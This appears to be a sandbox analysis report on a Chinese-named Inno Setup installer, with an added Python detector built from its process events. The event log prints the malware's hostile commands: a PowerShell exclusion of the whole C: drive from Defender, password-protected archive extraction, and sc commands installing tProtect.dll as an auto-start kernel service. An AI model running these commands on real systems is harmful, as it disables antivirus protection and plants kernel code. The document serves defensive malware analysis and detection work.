Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp (00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, 00000006.00000002.2298504162.0000000004429000.00000004.00001000.00020000.00000000.sdmp), 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr | Strings found in binary or memory:
  (all of the following are DigiCert certificate, CRL and OCSP URLs from embedded Authenticode signature data, not network indicators of the malware; the trailing "0E", "0C", "07", "0J" and similar characters are the adjacent DER bytes, a SEQUENCE tag 0x30 ("0") followed by a length byte, that the string scanner picked up after each URL)
  http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
  http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
  http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
  http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
  http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
  http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
  http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
  http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
  http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
  http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
  http://ocsp.digicert.com0A
  http://ocsp.digicert.com0C
  http://ocsp.digicert.com0H
  http://ocsp.digicert.com0I
  http://ocsp.digicert.com0X
  http://www.digicert.com/CPS0
  http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2108961550.000000007F95B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2108604500.0000000002F90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000000.2110772600.0000000000251000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000000.2123660203.00000000006CD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.5.dr | String found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2108961550.000000007F95B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2108604500.0000000002F90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000000.2110772600.0000000000251000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000000.2123660203.00000000006CD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.5.dr | String found in binary or memory: https://www.remobjects.com/ps
  (these three strings, the is-XXXXX.tmp unpack directory and the /SL5= relaunch parameter seen in the process tree are all standard Inno Setup artefacts; RemObjects Pascal Script is the scripting engine Inno Setup embeds, which gives an installer the ability to run arbitrary code, here PowerShell, 7zr.exe and sc.exe, during setup)

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: 01 00 00 00 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CAD3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CAD3886
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CC55120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6CC55120
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CAD3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CAD3C62
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CC55D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CC55D60
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CAD3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CAD3D18
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CAD3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CAD3D62
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CAD39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CAD39CF
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CAD3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CAD3A6A
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CAD1950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6CAD1950
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CAD4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6CAD4754
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: String function: 6CC89240 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: String function: 6CD26F10 appears 727 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 007C28E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 007C1E40 appears 151 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 0085FB10 appears 723 times
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000000.2107201494.00000000004D9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameJvZmpUrwOHxhtD.exe vs #U5b89#U88c5#U52a9#U624b1.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2108961550.000000007FC5A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameJvZmpUrwOHxhtD.exe vs #U5b89#U88c5#U52a9#U624b1.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2108604500.00000000030AE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameJvZmpUrwOHxhtD.exe vs #U5b89#U88c5#U52a9#U624b1.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeBinary or memory string: OriginalFileNameJvZmpUrwOHxhtD.exe vs #U5b89#U88c5#U52a9#U624b1.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal92.evad.winEXE@137/33@0/0
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CC55D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CC55D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007C9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_007C9313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007D3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_007D3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007C9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_007C9252
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CC55240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,6_2_6CC55240
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Program Files (x86)\Windows NT\is-51JMP.tmp
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2020:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeFile created: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeVirustotal: Detection: 6%
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$2040C,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$1042A,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Process created: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$2040C,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Process created: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$1042A,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar (this entry is repeated 31 times in the report)
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
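The process chain recorded above is the part of this report a detection engineer will want to turn into rules: the Inno Setup stub spawns PowerShell to exclude the whole of C:\ from Defender, relaunches itself with /VERYSILENT, unpacks two password-protected .dat archives with a bundled 7zr.exe, then registers the extracted tProtect.dll as an auto-start kernel service named CleverSoar and starts it. The Python below is an added example written for this page, not code from Joe Sandbox or from the sample. It runs three rules over process-creation events modelled on the report's lines (the event list, shortened installer paths, rule names and severities are constructed for illustration) and, going beyond what the report shows, also decodes a -EncodedCommand argument so that the base64 form of the same Add-MpPreference call is caught.

```python
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    severity: str
    rule: str
    detail: str


# Cmdlet as typed in clear text or as recovered from -EncodedCommand.
EXCLUSION = re.compile(
    r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+'([^']*)'", re.I)
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")
ENCODED = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
SC_CREATE = re.compile(r"\bsc(?:\.exe)?\s+create\b", re.I)
SC_BINPATH = re.compile(r'binPath=\s*(?:"([^"]+)"|(\S+))', re.I)
SC_TYPE = re.compile(r"\btype=\s*(\S+)", re.I)
# 7-Zip (7z.exe or the reduced 7zr.exe) extracting with a -p<password> switch.
ARCHIVE_PW = re.compile(r"\b7zr?(?:\.exe)?\s+x\b.*?\s-p(\S+)", re.I)


def expand_encoded(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload (UTF-16LE, base64) to the line."""
    m = ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} {decoded}"


def analyse(source: str, cmdline: str) -> list[Finding]:
    """Apply the three rules to one (parent image, command line) event."""
    findings: list[Finding] = []
    text = expand_encoded(cmdline)

    # Rule 1: Defender exclusion added by a process; a whole drive root is the worst case.
    m = EXCLUSION.search(text)
    if m:
        kind, target = m.group(1), m.group(2)
        sev = "critical" if kind.lower() == "path" and DRIVE_ROOT.match(target) else "high"
        findings.append(Finding(sev, "defender_exclusion", f"{kind}={target} via {source}"))

    # Rule 2: kernel-mode service whose image is not a .sys under System32\drivers.
    if SC_CREATE.search(text):
        t = SC_TYPE.search(text)
        b = SC_BINPATH.search(text)
        svc_type = t.group(1).lower() if t else ""
        binpath = (b.group(1) or b.group(2)) if b else ""
        low = binpath.lower()
        if svc_type == "kernel" and (
                not low.endswith(".sys") or "\\system32\\drivers\\" not in low):
            findings.append(Finding("critical", "kernel_service_odd_binpath", binpath))

    # Rule 3: password-protected archive unpacked by something running from a temp directory.
    m = ARCHIVE_PW.search(text)
    if m and "\\temp\\" in source.lower():
        findings.append(Finding("medium", "password_archive_extract",
                                f"password={m.group(1)} by {source}"))
    return findings


def triage(events: list[tuple[str, str]]) -> list[Finding]:
    return [f for src, cmd in events for f in analyse(src, cmd)]


# Constructed sample events modelled on the report's "Process created" lines
# (installer paths shortened; the encoded variant is built here, not taken from the report).
_ENC = base64.b64encode(
    "Add-MpPreference -ExclusionPath 'C:\\'".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    (r"C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\setup.tmp",
     "powershell.exe -Command \"Add-MpPreference -ExclusionPath 'C:\\'\""),
    (r"C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\setup.tmp",
     f"powershell.exe -EncodedCommand {_ENC}"),
    (r"C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\setup.tmp",
     "7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald"),
    (r"C:\Windows\System32\cmd.exe",
     'sc create CleverSoar displayname= CleverSoar binPath= '
     '"C:\\Program Files (x86)\\Windows NT\\tProtect.dll" type= kernel start= auto'),
    (r"C:\Windows\System32\cmd.exe", "sc start CleverSoar"),       # no rule fires
    (r"C:\Windows\System32\cmd.exe",                                 # benign control
     'sc create Legit binPath= "C:\\Windows\\System32\\drivers\\legit.sys" type= kernel'),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.detail}")
```

Rule 2 keys on the service type rather than the file extension alone, because a kernel service with a .dll image path is unusual enough on its own to justify a high-severity alert; the extension and directory checks only add context. The repeated `sc start CleverSoar` entries produce no findings by design, since the create event is the one worth alerting on.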
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Section loaded: coreuicomponents.dll
